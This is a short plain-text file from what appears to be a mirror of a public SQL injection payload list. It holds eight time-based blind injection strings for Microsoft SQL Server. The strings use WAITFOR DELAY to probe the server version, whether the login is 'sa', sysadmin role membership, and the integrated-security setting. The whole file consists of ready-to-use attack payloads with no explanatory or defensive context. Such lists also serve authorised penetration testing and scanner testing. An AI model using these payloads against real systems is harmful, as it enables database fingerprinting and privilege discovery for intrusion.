mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-24 13:15:40 +00:00
9 lines
618 B
Plaintext
9 lines
618 B
Plaintext
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
|
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
|
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
|
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
|
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
|
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
|
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
|
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
|